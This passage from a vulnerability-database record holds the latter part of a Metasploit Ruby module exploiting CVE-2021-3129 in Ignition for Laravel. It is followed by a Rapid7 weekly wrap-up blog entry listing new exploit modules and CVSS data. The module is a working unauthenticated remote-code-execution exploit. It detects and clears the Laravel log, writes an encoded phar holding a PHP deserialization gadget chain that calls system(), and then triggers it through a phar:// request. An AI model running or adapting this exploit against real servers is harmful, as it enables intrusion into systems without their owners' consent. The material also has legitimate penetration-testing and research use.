\n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']), \nOptString.new('LOGFILE', [false, 'Laravel log file absolute path']) \n]) \nend \n \ndef check \nprint_status(\"Checking 
component version to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'method' => 'PUT' \n}, 1) \n# Check whether it is using facade/ignition \n# If is using it should respond method not allowed \n# checking if debug mode is enable \nif res && res.code == 405 && res.body.match(/label:\"(Debug)\"/) \nvprint_status 'Debug mode is enabled.' \n# check version \nversions = JSON.parse( \nres.body.match(/.+\"report\":(\\{.*),\"exception_class/).captures.first.gsub(/$/, '}') \n) \nversion = Rex::Version.new(versions['framework_version']) \nvprint_status \"Found PHP #{versions['language_version']} running Laravel #{version}\" \n# to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid) \n# but it is way more intrusive than just checking the version moreover we would need to call \n# the find_log_file method before, meaning four requests more. \nreturn Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1') \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \n@logfile = datastore['LOGFILE'] || find_log_file \nfail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile \n \nclear_log \nput_payload \nconvert_to_phar \nrun_phar \n \nhandler \n \nclear_log \nend \n \ndef find_log_file \nvprint_status 'Trying to detect log file' \nres = post Rex::Text.rand_text_alpha_upper(12) \nif res.code == 500 && res.body.match(%r{\"file\":\"(\\\\/[^\"]+?)/vendor\\\\/[^\"]+?}) \nlogpath = Regexp.last_match(1).gsub(/\\\\/, '') \nvprint_status \"Found directory candidate #{logpath}\" \nlogfile = \"#{logpath}/storage/logs/laravel.log\" \nvprint_status \"Checking if #{logfile} exists\" \nres = post logfile \nif res.code == 200 \nvprint_status \"Found log file #{logfile}\" \nreturn logfile \nend \nvprint_error \"Log file does not exist #{logfile}\" \nreturn \nend \nvprint_error 'Unable to 
automatically find the log file. To continue set LOGFILE manually' \nreturn \nend \n \ndef clear_log \nres = post \"php://filter/read=consumed/resource=#{@logfile}\" \n# guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true) \nfail_with(Failure::UnexpectedReply, \"Log file #{@logfile} doesn't seem to exist.\") unless res.code == 200 \nend \n \ndef put_payload \npost format_payload \npost Rex::Text.rand_text_alpha_upper(2) \nend \n \ndef convert_to_phar \nfilters = %w[ \nconvert.quoted-printable-decode \nconvert.iconv.utf-16le.utf-8 \nconvert.base64-decode \n].join('|') \n \npost \"php://filter/write=#{filters}/resource=#{@logfile}\" \nend \n \ndef run_phar \npost \"phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt\" \n# resp.body.match(%r{^(.*)\\n<!doctype html>}) \n# $1 ? print_good($1) : nil \nend \n \ndef body_template(data) \n{ \nsolution: 'Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution', \nparameters: { \nviewFile: data, \nvariableName: Rex::Text.rand_text_alpha_lower(4..12) \n} \n}.to_json \nend \n \ndef post(data) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'method' => 'POST', \n'data' => body_template(data), \n'ctype' => 'application/json', \n'headers' => { \n'Accept' => '*/*', \n'Accept-Encoding' => 'gzip, deflate' \n} \n}) \nend \n \ndef generate_phar(pop) \nfile = Rex::Text.rand_text_alpha_lower(8) \nstub = \"<?php __HALT_COMPILER(); ?>\\r\\n\" \nfile_contents = Rex::Text.rand_text_alpha_lower(20) \nfile_crc32 = Zlib.crc32(file_contents) & 0xffffffff \nmanifest_len = 40 + pop.length + file.length \nphar = stub \nphar << [manifest_len].pack('V') # length of manifest in bytes \nphar << [0x1].pack('V') # number of files in the phar \nphar << [0x11].pack('v') # api version of the phar manifest \nphar << [0x10000].pack('V') # global phar bitmapped flags \nphar << [0x0].pack('V') # length of phar alias \nphar << [pop.length].pack('V') # length of phar metadata 
\nphar << pop # pop chain \nphar << [file.length].pack('V') # length of filename in the archive \nphar << file # filename \nphar << [file_contents.length].pack('V') # length of the uncompressed file contents \nphar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970. \nphar << [file_contents.length].pack('V') # length of the compressed file contents \nphar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents \nphar << [0x1b6].pack('V') # bit-mapped file-specific flags \nphar << [0x0].pack('V') # serialized File Meta-data length \nphar << file_contents # serialized File Meta-data \nphar << [Rex::Text.sha1(phar)].pack('H*') # signature \nphar << [0x2].pack('V') # signiture type \nphar << 'GBMB' # signature presence \n \nreturn phar \nend \n \ndef format_payload \n# rubocop:disable Style/StringLiterals \nserialize = \"a:2:{i:7;O:31:\\\"GuzzleHttp\\\\Cookie\\\\FileCookieJar\\\"\" \nserialize << \":1:{S:41:\\\"\\\\00GuzzleHttp\\\\5cCookie\\\\5cFileCookieJar\\\\00filename\\\";\" \nserialize << \"O:38:\\\"Illuminate\\\\Validation\\\\Rules\\\\RequiredIf\\\"\" \nserialize << \":1:{S:9:\\\"condition\\\";a:2:{i:0;O:20:\\\"PhpOption\\\\LazyOption\\\"\" \nserialize << \":2:{S:30:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00callback\\\";\" \nserialize << \"S:6:\\\"system\\\";S:31:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00arguments\\\";\" \nserialize << \"a:1:{i:0;S:#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}}i:1;S:3:\\\"get\\\";}}}i:7;i:7;}\" \n# rubocop:enable Style/StringLiterals \nphar = generate_phar(serialize) \n \nb64_gadget = Base64.strict_encode64(phar).gsub('=', '') \npayload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join \n \nreturn Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00' \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165999/ignition_laravel_debug_rce.rb.txt"}], "rapid7blog": [{"lastseen": 
"2022-02-18T23:35:18", "description": "## Nagios XI web shell upload module\n\n\n\nNew this week is a [Nagios Web Shell Upload module](<https://github.com/rapid7/metasploit-framework/pull/16150>) from Rapid7' own [Jake Baines](<https://github.com/jbaines-r7>), which exploits [CVE-2021-37343](<https://attackerkb.com/topics/zxpvqMqOHQ/cve-2021-37343?referrer=blog>). This module builds upon the existing [Nagios XI scanner](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/nagios_xi_scanner.md>) written by [Erik Wynter](<https://github.com/ErikWynter>). Versions of Nagios XI prior to 5.8.5 are vulnerable to a path traversal exploit through an admin-authenticated PHP web shell that results in code execution as the `www-data` user.\n\n## Ignition for Laravel RCE module\n\nCommunity contributor [heyder](<http://https://github.com/heyder>) [added a module](<https://github.com/rapid7/metasploit-framework/pull/16159>) which exploits [CVE-2021-3129](<https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129?referrer=blog>) in Ignition for Laravel, versions prior to 2.5.2. This module allows for unauthenticated remote code execution due to insecure usage of the PHP functions `file_get_contents()` and `file_put_contents()`.\n\n## New module content (3)\n\n * [Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump](<https://github.com/rapid7/metasploit-framework/pull/16087>) by jbaines-r7, which exploits [CVE-2020-5723](<https://attackerkb.com/topics/RB012Xn6ww/cve-2020-5723?referrer=blog>) \\- A new module has been added which exploits [CVE-2020-5724](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-5724>), a blind SQL injection in GrandStream UCM62xx IP PBX devices prior to firmware version 1.20.22 to dump usernames and passwords from the `users` table as an unauthenticated attacker. 
Successfully gathered credentials will be stored in Metasploit's credential database for use in further attacks.\n * [Nagios XI Autodiscovery Webshell Upload](<https://github.com/rapid7/metasploit-framework/pull/16150>) by Claroty Team82 and jbaines-r7, which exploits [CVE-2021-37343](<https://attackerkb.com/topics/zxpvqMqOHQ/cve-2021-37343?referrer=blog>) \\- This exploits a path traversal vulnerability in Nagios XI versions below `5.8.5` to achieve authenticated code execution as the `www-data` user.\n * [Unauthenticated remote code execution in Ignition](<https://github.com/rapid7/metasploit-framework/pull/16159>) by Heyder Andrade and ambionics, which exploits [CVE-2021-3129](<https://attackerkb.com/topics/KP6wETuZyw/cve-2021-3129?referrer=blog>) \\- This module exploits a vulnerability in Ignition before 2.5.2, as used in Laravel and other products, that allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of `file_get_contents()` and `file_put_contents()`.\n\n## Enhancements and features\n\n * [#16076](<https://github.com/rapid7/metasploit-framework/pull/16076>) from [bcoles](<https://github.com/bcoles>) \\- This change adds the Meterpreter session type to the `post/osx/gather/hashdump` module, hiding a warning when the module is run with a Meterpreter session.\n * [#16117](<https://github.com/rapid7/metasploit-framework/pull/16117>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This makes some Log4Shell updates. 
It refactors the scanner to reduce duplicate code, and fixes a couple of minor bugs.\n * [#16161](<https://github.com/rapid7/metasploit-framework/pull/16161>) from [smashery](<https://github.com/smashery>) \\- This PR updates the user agent strings for HTTP payloads to use the latest user agent strings for Chrome, Edge and Firefox on Windows and macOS, as well as iPad.\n * [#16170](<https://github.com/rapid7/metasploit-framework/pull/16170>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This change fixes the native_arch functionality on Java and ensures the native architecture is displayed when running `meterpreter > sysinfo` on Java.\n * [#16173](<https://github.com/rapid7/metasploit-framework/pull/16173>) from [AlanFoster](<https://github.com/AlanFoster>) \\- Adds additional `--no-readline` and `--readline` options to msfconsole for configuring the use of Readline support.\n * [#16181](<https://github.com/rapid7/metasploit-framework/pull/16181>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This adds a resource script for extracting the Meterpreter commands from currently open sessions.\n * [#16192](<https://github.com/rapid7/metasploit-framework/pull/16192>) from [zha0gongz1](<https://github.com/zha0gongz1>) \\- The session notifier has been updated to support notifying about new sessions via WeChat using the ServerJang API and servers.\n * [#16195](<https://github.com/rapid7/metasploit-framework/pull/16195>) from [darrenmartyn](<https://github.com/darrenmartyn>) \\- The `hp_dataprotector_cmd_exec.rb` module has been updated to support x64 payloads. 
This fixes a bug whereby x64 payloads were not supported as the `Arch` value was not set, leading it to default to x86 payloads only.\n\n## Bugs fixed\n\n * [#16174](<https://github.com/rapid7/metasploit-framework/pull/16174>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the mode specification on File.read required for ruby 3 on multiple modules.\n * [#16175](<https://github.com/rapid7/metasploit-framework/pull/16175>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the loadpath command summary to display the module types in alphabetical order.\n * [#16177](<https://github.com/rapid7/metasploit-framework/pull/16177>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This change fixes the post(test/search) Meterpreter tests on OSX.\n * [#16184](<https://github.com/rapid7/metasploit-framework/pull/16184>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash when running msfconsole on a Windows host in conjunction with the `sessions -u` command.\n * [#16194](<https://github.com/rapid7/metasploit-framework/pull/16194>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a crash when using Metasploit's psexec module with the Command target.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.29...6.1.30](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-09T14%3A46%3A38-06%3A00..2022-02-16T23%3A31%3A40-06%3A00%22>)\n * [Full diff 6.1.29...6.1.30](<https://github.com/rapid7/metasploit-framework/compare/6.1.29...6.1.30>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-18T21:24:12", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5723", "CVE-2020-5724", "CVE-2021-3129", "CVE-2021-37343"], "modified": "2022-02-18T21:24:12", "id": "RAPID7BLOG:682AF2364002B8852065C1D4694ED089", "href": "https://blog.rapid7.com/2022/02/18/metasploit-wrap-up-149/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}